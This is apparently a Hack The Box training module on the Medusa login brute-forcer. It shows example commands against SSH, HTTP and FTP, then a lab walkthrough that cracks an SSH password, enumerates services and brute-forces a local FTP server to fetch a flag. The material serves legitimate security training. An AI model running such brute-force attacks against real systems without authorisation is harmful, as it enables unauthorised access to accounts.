Medusa, a prominent tool in the cybersecurity arsenal, is designed to be a fast, massively parallel, and modular login brute-forcer. Its primary objective is to support a wide array of services that allow remote authentication, enabling penetration testers and security professionals to assess the resilience of login systems against brute-force attacks.
Installation
Medusa often comes pre-installed on popular penetration testing distributions. You can verify its presence by running:
Medusa
sasorirose@htb[/htb]$ medusa -hInstalling Medusa on a Linux system is straightforward.
Medusa
sasorirose@htb[/htb]$ sudo apt-get -y updatesasorirose@htb[/htb]$ sudo apt-get -y install medusaCommand Syntax and Parameter Table
Medusa's command-line interface is straightforward. It allows users to specify hosts, users, passwords, and modules with various options to fine-tune the attack process.
Medusa
sasorirose@htb[/htb]$ medusa [target_options] [credential_options] -M module [module_options]Medusa Modules
Each module in Medusa is tailored to interact with specific authentication mechanisms, allowing it to send the appropriate requests and interpret responses for successful attacks. Below is a table of commonly used modules:
Targeting an SSH Server
Imagine a scenario where you need to test the security of an SSH server at 192.168.0.100. You have a list of potential usernames in usernames.txt and common passwords in passwords.txt. To launch a brute-force attack against the SSH service on this server, use the following Medusa command:
Medusa
sasorirose@htb[/htb]$ medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M sshThis command instructs Medusa to:
- Target the host at 192.168.0.100.
- Use the usernames from the usernames.txt file.
- Test the passwords listed in the passwords.txt file.
- Employ the ssh module for the attack.
Medusa will systematically try each username-password combination against the SSH service to attempt to gain unauthorized access.
Targeting Multiple Web Servers with Basic HTTP Authentication
Suppose you have a list of web servers that use basic HTTP authentication. These servers' addresses are stored in web_servers.txt, and you also have lists of common usernames and passwords in usernames.txt and passwords.txt, respectively. To test these servers concurrently, execute:
Medusa
sasorirose@htb[/htb]$ medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GETIn this case, Medusa will:
- Iterate through the list of web servers in web_servers.txt.
- Use the usernames and passwords provided.
- Employ the http module with the GET method to attempt logins.
By running multiple threads, Medusa efficiently checks each server for weak credentials.
Testing for Empty or Default Passwords
If you want to assess whether any accounts on a specific host (10.0.0.5) have empty or default passwords (where the password matches the username), you can use:
Medusa
sasorirose@htb[/htb]$ medusa -h 10.0.0.5 -U usernames.txt -e ns -M service_nameThis command instructs Medusa to:
- Target the host at 10.0.0.5.
- Use the usernames from usernames.txt.
- Perform additional checks for empty passwords (e n) and passwords matching the username (e s).
- Use the appropriate service module (replace service_name with the correct module name).
Medusa will try each username with an empty password and then with the password matching the username, potentially revealing accounts with weak or default configurations.
Web Services
In the dynamic landscape of cybersecurity, maintaining robust authentication mechanisms is paramount. While technologies like Secure Shell (SSH) and File Transfer Protocol (FTP) facilitate secure remote access and file management, they are often reliant on traditional username-password combinations, presenting potential vulnerabilities exploitable through brute-force attacks. In this module, we will delve into the practical application of Medusa, a potent brute-forcing tool, to systematically compromise both SSH and FTP services, thereby illustrating potential attack vectors and emphasizing the importance of fortified authentication practices.
SSH is a cryptographic network protocol that provides a secure channel for remote login, command execution, and file transfers over an unsecured network. Its strength lies in its encryption, which makes it significantly more secure than unencrypted protocols like Telnet. However, weak or easily guessable passwords can undermine SSH's security, exposing it to brute-force attacks.
FTP is a standard network protocol for transferring files between a client and a server on a computer network. It's also widely used for uploading and downloading files from websites. However, standard FTP transmits data, including login credentials, in cleartext, rendering it susceptible to interception and brute-forcing.
Kick-off
To follow along, start the target system via the question section at the bottom of the page.
We begin our exploration by targeting an SSH server running on a remote system. Assuming prior knowledge of the username sshuser, we can leverage Medusa to attempt different password combinations until successful authentication is achieved systematically.
The following command serves as our starting point:
Web Services
sasorirose@htb[/htb]$ medusa -h -n -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3
Let's break down each component:
- h
: Specifies the target system's IP address.
- n
: Defines the port on which the SSH service is listening (typically port 22).
- u sshuser: Sets the username for the brute-force attack.
- P 2023-200_most_used_passwords.txt: Points Medusa to a wordlist containing the 200 most commonly used passwords in 2023. The effectiveness of a brute-force attack is often tied to the quality and relevance of the wordlist used.
- M ssh: Selects the SSH module within Medusa, tailoring the attack specifically for SSH authentication.
- t 3: Dictates the number of parallel login attempts to execute concurrently. Increasing this number can speed up the attack but may also increase the likelihood of detection or triggering security measures on the target system.
Web Services
sasorirose@htb[/htb]$ medusa -h IP -n PORT -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -t 3Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
...
ACCOUNT FOUND: [ssh] Host: IP User: sshuser Password: 1q2w3e4r5t [SUCCESS]
Upon execution, Medusa will display its progress as it cycles through the password combinations. The output will indicate a successful login, revealing the correct password.
Gaining Access
With the password in hand, establish an SSH connection using the following command and enter the found password when prompted:
Web Services
sasorirose@htb[/htb]$ ssh sshuser@ -p PORT
This command will initiate an interactive SSH session, granting you access to the remote system's command line.
Expanding the Attack Surface
Once inside the system, the next step is identifying other potential attack surfaces. Using netstat (within the SSH session) to list open ports and listening services, you discover a service running on port 21.
Web Services
sasorirose@htb[/htb]$ netstat -tulpn | grep LISTENtcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
Further reconnaissance with nmap (within the SSH session) confirms this finding as an ftp server.
Web Services
sasorirose@htb[/htb]$ nmap localhostStarting Nmap 7.80 ( https://nmap.org ) at 2024-09-05 13:19 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000078s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 998 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
Targeting the FTP Server
Having identified the FTP server, you can proceed to brute-force its authentication mechanism.
If we explore the /home directory on the target system, we see an ftpuser folder, which implies the likelihood of the FTP server username being ftpuser. Based on this, we can modify our Medusa command accordingly:
Web Services
sasorirose@htb[/htb]$ medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp -t 5Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
GENERAL: Parallel Hosts: 1 Parallel Logins: 5
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 197
...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ... Password: ... [SUCCESS]
...
GENERAL: Medusa has finished.
The key differences here are:
- h 127.0.0.1: Targets the local system, as the FTP server is running locally. Using the IP address tells medusa explicitly to use IPv4.
- u ftpuser: Specifies the username ftpuser.
- M ftp: Selects the FTP module within Medusa.
- t 5: Increases the number of parallel login attempts to 5.
Retrieving The Flag
Upon successfully cracking the FTP password, establish an FTP connection. Within the FTP session, use the get command to download the flag.txt file, which may contain sensitive information.:
Web Services
sasorirose@htb[/htb]$ ftp ftp://ftpuser:@localhost
Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||25926|)
150 Here comes the directory listing.
-rw------- 1 1001 1001 35 Sep 05 13:17 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||37251|)
150 Opening BINARY mode data connection for flag.txt (35 bytes).
100% |***************************************************************************| 35 776.81 KiB/s 00:00 ETA
226 Transfer complete.
35 bytes received in 00:00 (131.45 KiB/s)
ftp> exit
221 Goodbye.
Then read the file to get the flag:
Web Services
sasorirose@htb[/htb]$ cat flag.txtHTB{...}
The ease with which such attacks can be executed underscores the importance of employing strong, unique passwords.